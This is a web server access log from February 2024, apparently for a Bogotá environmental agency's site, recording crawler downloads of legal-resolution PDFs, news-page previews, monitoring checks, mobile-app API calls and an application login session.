216.244.66.195 - - [03/Feb/2024:08:02:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/2299.pdf HTTP/1.1" 200 334555
173.252.87.10 - - [03/Feb/2024:08:02:29 -0500] "GET /images/25%20de%20enero%20M\xc3\xb3vil%20Fauna.jpg HTTP/1.1" 404 1034
216.244.66.195 - - [03/Feb/2024:08:02:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/2564.pdf HTTP/1.1" 200 362856
216.244.66.195 - - [03/Feb/2024:08:03:05 -0500] "GET /BLA/resoluciones/AUTOS%202020/2585.pdf HTTP/1.1" 200 363362
157.55.39.51 - - [03/Feb/2024:08:03:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0905.pdf HTTP/1.1" 200 494605
216.244.66.195 - - [03/Feb/2024:08:03:28 -0500] "GET /BLA/resoluciones/AUTOS%202020/2745.pdf HTTP/1.1" 200 328790
172.22.2.4 - - [03/Feb/2024:08:02:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:08:03:53 -0500] "GET /BLA/resoluciones/AUTOS%202020/2992.pdf HTTP/1.1" 200 371283
216.244.66.195 - - [03/Feb/2024:08:04:13 -0500] "GET /BLA/resoluciones/AUTOS%202020/3142.pdf HTTP/1.1" 200 358954
216.244.66.195 - - [03/Feb/2024:08:04:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/3183.pdf HTTP/1.1" 200 897866
172.22.2.4 - - [03/Feb/2024:08:02:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61040
216.244.66.195 - - [03/Feb/2024:08:05:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/3331.pdf HTTP/1.1" 200 355642
216.244.66.195 - - [03/Feb/2024:08:05:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/3846.pdf HTTP/1.1" 200 400298
201.245.192.253 - - [03/Feb/2024:08:05:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:06:02 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:08:06:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/4074.pdf HTTP/1.1" 200 402738
216.244.66.195 - - [03/Feb/2024:08:06:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/4354.pdf HTTP/1.1" 200 391628
216.244.66.195 - - [03/Feb/2024:08:07:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/4373.pdf HTTP/1.1" 200 431594
216.244.66.195 - - [03/Feb/2024:08:07:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/4423.pdf HTTP/1.1" 200 407731
216.244.66.195 - - [03/Feb/2024:08:08:16 -0500] "GET /BLA/resoluciones/AUTOS%202020/4488.pdf HTTP/1.1" 200 382893
172.22.2.4 - - [03/Feb/2024:08:07:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:08:08:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58677
201.245.192.253 - - [03/Feb/2024:08:10:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:11:03 -0500] "HEAD / HTTP/1.1" 200 -
173.252.111.6 - - [03/Feb/2024:08:12:16 -0500] "GET /alcalde-mayor-recorrio-zona-del-parque-entrenubes-afectada-por-incendio-forestal.html HTTP/1.1" 200 922
173.252.111.5 - - [03/Feb/2024:08:12:16 -0500] "GET /alcalde-mayor-recorrio-zona-del-parque-entrenubes-afectada-por-incendio-forestal.html HTTP/1.1" 200 922
173.252.79.7 - - [03/Feb/2024:08:13:28 -0500] "GET /images/Caminatas%20(1)%20(2).jpeg HTTP/1.1" 200 81411
172.22.2.4 - - [03/Feb/2024:08:13:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.111.13 - - [03/Feb/2024:08:15:38 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
173.252.95.4 - - [03/Feb/2024:08:15:45 -0500] "GET /secretaria-de-ambiente-y-sena-abren-curso-de-jardines-verticales.html HTTP/1.1" 200 734
66.220.149.18 - - [03/Feb/2024:08:15:46 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
201.245.192.253 - - [03/Feb/2024:08:15:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:16:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:08:16:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [03/Feb/2024:08:16:07 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [03/Feb/2024:08:14:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58303
216.244.66.195 - - [03/Feb/2024:08:16:19 -0500] "GET /BLA/resoluciones/AUTOS%202018/2439.pdf HTTP/1.1" 200 340056
172.22.2.4 - - [03/Feb/2024:08:16:24 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2023&resuelve=pruebas HTTP/1.1" 200 1128
186.84.128.123 - - [03/Feb/2024:08:16:37 -0500] "GET /BLA/resoluciones/AUTOS%202023/1734.pdf HTTP/1.1" 200 400350
216.244.66.195 - - [03/Feb/2024:08:16:43 -0500] "GET /BLA/resoluciones/AUTOS%202018/2954.pdf HTTP/1.1" 200 266928
216.244.66.195 - - [03/Feb/2024:08:17:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/6099.pdf HTTP/1.1" 200 274194
173.252.95.20 - - [03/Feb/2024:08:17:13 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
172.22.2.4 - - [03/Feb/2024:08:17:21 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2023&resuelve=%20PR%C1CTICA%20DE%20PRUEBAS HTTP/1.1" 200 1128
172.22.2.4 - - [03/Feb/2024:08:17:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=&usuario=&sector=&fecha=2022&resuelve=%20PR%C1CTICA%20DE%20PRUEBAS HTTP/1.1" 200 1497
186.84.128.123 - - [03/Feb/2024:08:17:37 -0500] "GET /BLA/resoluciones/AUTOS%202022/3038.pdf HTTP/1.1" 200 425260
216.244.66.195 - - [03/Feb/2024:08:17:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/4460.pdf HTTP/1.1" 200 647466
207.46.13.78 - - [03/Feb/2024:08:18:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5538.pdf HTTP/1.1" 304 -
186.84.128.123 - - [03/Feb/2024:08:18:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/6096.pdf HTTP/1.1" 200 448405
216.244.66.195 - - [03/Feb/2024:08:18:28 -0500] "GET /BLA/resoluciones/AUTOS%202022/4393.pdf HTTP/1.1" 200 464124
66.249.66.20 - - [03/Feb/2024:08:18:39 -0500] "GET /Publicaciones/2023EE263071.pdf HTTP/1.1" 404 228
216.244.66.195 - - [03/Feb/2024:08:19:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0170.pdf HTTP/1.1" 200 778562
201.245.192.253 - - [03/Feb/2024:08:19:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40409
201.245.192.253 - - [03/Feb/2024:08:19:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40091
201.245.192.253 - - [03/Feb/2024:08:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40574
216.244.66.195 - - [03/Feb/2024:08:19:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1368.pdf HTTP/1.1" 200 1405678
216.244.66.195 - - [03/Feb/2024:08:20:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1092.pdf HTTP/1.1" 200 345118
201.245.192.253 - - [03/Feb/2024:08:20:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40091
216.244.66.195 - - [03/Feb/2024:08:20:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1193.pdf HTTP/1.1" 200 895511
201.245.192.253 - - [03/Feb/2024:08:20:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:21:02 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.49 - - [03/Feb/2024:08:21:03 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5667
172.22.2.4 - - [03/Feb/2024:08:19:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [03/Feb/2024:08:21:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1731.pdf HTTP/1.1" 200 283552
216.244.66.195 - - [03/Feb/2024:08:21:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2297.pdf HTTP/1.1" 200 434307
172.22.2.4 - - [03/Feb/2024:08:20:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61040
216.244.66.195 - - [03/Feb/2024:08:22:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3793.pdf HTTP/1.1" 200 361249
216.244.66.195 - - [03/Feb/2024:08:23:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4299.pdf HTTP/1.1" 200 363001
173.252.107.9 - - [03/Feb/2024:08:23:26 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
173.252.107.3 - - [03/Feb/2024:08:23:40 -0500] "GET /esta-abierta-la-convocatoria-para-ser-parte-del-programa-de-voluntariado-ambiental-de-bogota.html HTTP/1.1" 200 972
69.171.251.14 - - [03/Feb/2024:08:23:40 -0500] "GET /images/pieza-voluntariado-ambiental.jpg HTTP/1.1" 200 41042
201.245.192.253 - - [03/Feb/2024:08:25:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:26:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:08:25:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Feb/2024:08:26:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58677
201.245.192.253 - - [03/Feb/2024:08:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40409
201.245.192.253 - - [03/Feb/2024:08:29:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40091
201.245.192.253 - - [03/Feb/2024:08:29:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40574
201.245.192.253 - - [03/Feb/2024:08:30:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40091
201.245.192.253 - - [03/Feb/2024:08:30:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:31:02 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.33 - - [03/Feb/2024:08:32:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/3704.pdf HTTP/1.1" 200 425781
172.22.2.4 - - [03/Feb/2024:08:31:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.87.116 - - [03/Feb/2024:08:33:32 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
173.252.95.12 - - [03/Feb/2024:08:33:35 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
173.252.95.15 - - [03/Feb/2024:08:33:35 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
173.252.95.12 - - [03/Feb/2024:08:33:35 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
172.22.2.4 - - [03/Feb/2024:08:32:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52377
173.252.107.117 - - [03/Feb/2024:08:34:14 -0500] "GET /tinguas-azules-secretaria-de-ambiente-atiende-alto-numero-de-reportes-de-aves-migratorias.html HTTP/1.1" 200 923
201.245.192.253 - - [03/Feb/2024:08:35:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:36:02 -0500] "HEAD / HTTP/1.1" 200 -
3.224.220.101 - - [03/Feb/2024:08:37:37 -0500] "GET /robots.txt HTTP/1.1" 404 1018
23.22.35.162 - - [03/Feb/2024:08:37:39 -0500] "GET /isolucionsda/ HTTP/1.1" 302 168
23.22.35.162 - - [03/Feb/2024:08:37:40 -0500] "GET /Isolucionsda/PaginaLogin.aspx HTTP/1.1" 404 1018
216.244.66.195 - - [03/Feb/2024:08:38:04 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [03/Feb/2024:08:37:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Feb/2024:08:39:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40409
201.245.192.253 - - [03/Feb/2024:08:39:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40091
201.245.192.253 - - [03/Feb/2024:08:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40574
186.102.56.13 - - [03/Feb/2024:08:39:30 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/6lzZuOefWZYtW8lAWHE3JhjoNfVDfmHAQwShIMT5BK9cFx7rShy5+&y=U2FsdGVkX1/M2PRv4dZAluvaJX65AKKSIDsms88mecNO1k32rZA3nJioyfEBY4v+ HTTP/1.1" 200 30
186.102.56.13 - - [03/Feb/2024:08:39:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/q7D0Umkd8BRnXW1krQnyy6/6sXhCGrjsbHvA9fZUO6mO2jsMvDIjGptleoimTfrtwf7I+NjPxJou8fu4SYw0DuEGuq4hFQ98=&u=U2FsdGVkX18QAmBcXaY6GHJ8Yt3KpM++k+D+SeuquGOvRiPXXsAnN49LrrdZPJKG&y=U2FsdGVkX1/M2PRv4dZAluvaJX65AKKSIDsms88mecNO1k32rZA3nJioyfEBY4v+ HTTP/1.1" 200 97
186.102.56.13 - - [03/Feb/2024:08:39:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+bS+jFELdF5GpMhRU3uacYkDJfaP2+m3pnErkYwCjHrjn6QXl/AEtCz4m3hr3gNq3b6YdbSbEU4XukaUAFnqhPINHva2z3c7bpV45tKT+5jhYDgEORp3X7vDJbKXwC46fsuhuNSi04Vgb5sVay9vlu4hMJW/xy32e5PfItrSe3kPeGX6RvBsC8Qx6r4JjlbPlgEgOUribz9L0anR6CQQcEYGXKX+TF1VD/du6GUwWK2NN4FbYH8UGLJnRX8lruNA5JSGtk6sFPVpkokotsuUM6ScKUl3BzUqHRaNNj+mOu0NVtMCiludR/D67DUmWxQDeTqwzIofUV42F9JqQ8m0DgupUjJ2apu88AijfDzCLtHN6Oa4uMzeA0uNDgNi03aOpjQI4eOYH/PeOLbsEqR4D7xYEuL5cR8GXpMI/pVLpuax13j35xlNCV4PkcijlI0mSwFhhoLpuu/cbC59aLj3Khp5nMADDqwluUjW3rNvLvoXPhe0b0ErehVXh+ggC6VgSINZPpoPnv58a91NZhwU3CNUbnAOIZhHM1K/qZ6IkaSSFXuqU9AT9kcmB8hm87Lf6j8JEVojPNqMbg2rbXoDGeTpjBCjjS/RpEm8CKo/GvLa01Ue40XPQWVNDlzdfFmu986TK48si+8aZbBr4JlGLziBYpQqEZp3gkVckrdkOHRMT+Fcd2ZASs+R2duoebKhJp8UjmqYOrCVajAwqIF4+WbDH7CY88RlS/MlWRr2hNkRuVg9ibztVnTGgDfNksq2ceMOLTNoB3LCqivr7adTpfCaJB7QctW/iPr6CdUVfH4uMf6+kqSZQX167ElxT6tvw5qoLtVMyJmIwKE/CTeqBEG68EyNRfU6FdHENcGWDD8xjDrWty4vL9u3dM8ZbKtOaP0XAQ5PNANILdcoFUsOwBqOUpOmcTyhnuZ8KzyaWfwba21L0DsL1gm4t2wNm3lbldUW9jo4DhSc8fHK1JANNThhzXhhgCzNvLma00DoNSA52/ntJBRrWgvKYFUbEahYuGyNgrFWLXte3EXh4D3k6lUn/Xw4m2nA5F3g1p7nAk0p0cVkT6ThK+2ACUpKZw8rMQbU+JTqImqeq6QQEFhZz8n4Viivyrf7eX5lOGYcNsdbT6iqxcUZMGWqiiFb512CHSwGxdKVgprv0SfHcphxDkPh/jSxRjJCV0XTPXSKTULuiYkUGlzixEExgqASr/r4Qi7prE0JeWvY6+Vbho+qLmtT5keUe3wPPiNr3dmuvIhxfC8sp1RDpUJ53/pG3r0CflFyqlMbymILnCGza5zgJx0Rq4AmCG3AjqFWyAP+Oh+2cPSk0zDsC1+FuP/5+UKBsdsyPW8enOoXOB+YZd1IUd+jEEMfkq7c4vo8RNpmU1XSeOcFWiL/vGQE+IkSlaIDlag6RfSKgWpZOz5BQcOkBPmgvSdYkB3/41vLCI5mC90qEIl8OlEBT1/IRSdk03+8iRNEiA8+NO4BUFh47Nu89mjba5oRWWLD5kHUVinCfrU9r40EHbmef3ybtewkSfSR1LmWSeGKXWklvXtcCGVayko3BhSSx1GECfEBycyzK/xnBV75+EBVv+77r9vOntKv2Ihnrlhs6G7CHZqGMDD8pzFIKFhXeqY2nTRjT1pIbVkHBSEWt4IbAvrtK6Gq2kJ3kd0Cw1vGJnLjrV3rlw3jr6LnEpz8DoWGpfIQz78ibChzq4lbGlgIqLWnY0pPA2kqZH6JNonUZ+EKBdf9AhUNTVyF6iln4iiDNegsXU4AMv7r4v+wY0a1qn&u=U2FsdGVkX18QAmBcXaY6GHJ8Yt3KpM++k+D+SeuquGOvRiPXXsAnN49LrrdZPJKG&y=U2FsdGVkX1/M2PRv4dZAluvaJX65AKKSIDsms88mecNO1k32rZA3nJioyfEBY4v+ HTTP/1.1" 200 1686
186.102.56.13 - - [03/Feb/2024:08:39:31 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/8kO+ud/adMdd/I00b6JnZYrNprl8o0VV/gNTBLp50CabP1bPoyAkxe0WwwL4+UXoFWJWEy3qKEm+zxAfS7HTIqlxfoDkppbvrCu4hKdikHqDFli7Arxl3nmWDWy5iyfndc6jKz3punJZtLtRougW+PEvcr2hJxlkA3oqrc9i5lUg2TFIHF+h3bZ4NAl8wcxP0Zlc0Gmy6Kf4AWtyoIavnwUQVsqYdsjkZWgGW5lQ+Heyii83xu/yBNp6G+DT3cyKGjXmYMvDbelZNPh5Njw6YVwDeK8/bg1vqZ/MkwnLCJsImTZmbvA5X+McJpVrhoQ/k83Nn6AyvPnLkPpykJjkH5jjoot33E60Om7Xi5zsgfI+QAtf9MobTSUriO/31ZfIVSXBVRhcbpWD47keyORy8SVNWimaZBtnb3MS0US7hXM/5FwbLc5/7ID4x9W0M6wDtykU91qC0s0RtYXy1z2b7GY0BBygge0ReUst2Cs25rwerfbtYILb0quAESM2zY+h+7BacSBYQC2ddNHIxsIdnrrEi7YuAJpKad4BkgRxrXSIpBg5tm9+jeFFgeyNdI8Qj5gvBS6RXvG8ELOxRg8XSzmQGYU2AdlkYJNwnG9hkJ7hzwME1z6Lp8/cCNV/wd3w0Zkw2ZmNrOV3wvoPqK0RP9ijHs0nEq/qP3BVSuHjN2A91VE8v1wAudzPsTfHYuVaZg6u00KgtoPph0kPl3VkcUeZOt1ff8w8JtkyT5qIMVGOsDmZ5Cbu5&u=U2FsdGVkX18QAmBcXaY6GHJ8Yt3KpM++k+D+SeuquGOvRiPXXsAnN49LrrdZPJKG&y=U2FsdGVkX1/M2PRv4dZAluvaJX65AKKSIDsms88mecNO1k32rZA3nJioyfEBY4v+ HTTP/1.1" 200 208
186.102.56.13 - - [03/Feb/2024:08:39:31 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/6lzZuOefWZYtW8lAWHE3JhjoNfVDfmHAQwShIMT5BK9cFx7rShy5+ HTTP/1.1" 200 32032
172.22.2.4 - - [03/Feb/2024:08:37:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58677
31.13.103.3 - - [03/Feb/2024:08:40:09 -0500] "GET /conoce-las-actividades-en-bogota-para-celebrar-el-dia-mundial-de-los-humedales.html HTTP/1.1" 200 859
173.252.83.117 - - [03/Feb/2024:08:40:13 -0500] "GET /conoce-las-actividades-en-bogota-para-celebrar-el-dia-mundial-de-los-humedales.html HTTP/1.1" 200 859
66.220.149.15 - - [03/Feb/2024:08:40:16 -0500] "GET /images/31%20de%20enero%20humedal%20La%20Conejera.jpg HTTP/1.1" 200 33808
201.245.192.253 - - [03/Feb/2024:08:40:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40091
201.245.192.253 - - [03/Feb/2024:08:40:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37857
216.245.221.92 - - [03/Feb/2024:08:41:02 -0500] "HEAD / HTTP/1.1" 200 -
34.134.139.46 - - [03/Feb/2024:08:41:42 -0500] "GET /Publicaciones/2020EE125466.pdf HTTP/1.1" 404 228
181.52.223.52 - - [03/Feb/2024:08:44:08 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.52.223.52 - - [03/Feb/2024:08:44:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12404
181.52.223.52 - - [03/Feb/2024:08:44:08 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:08 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:09 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16776
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:17 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:20 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:20 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 38963
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12977
172.22.2.4 - - [03/Feb/2024:08:42:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.52.223.52 - - [03/Feb/2024:08:44:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 121280
181.52.223.52 - - [03/Feb/2024:08:44:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [03/Feb/2024:08:44:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
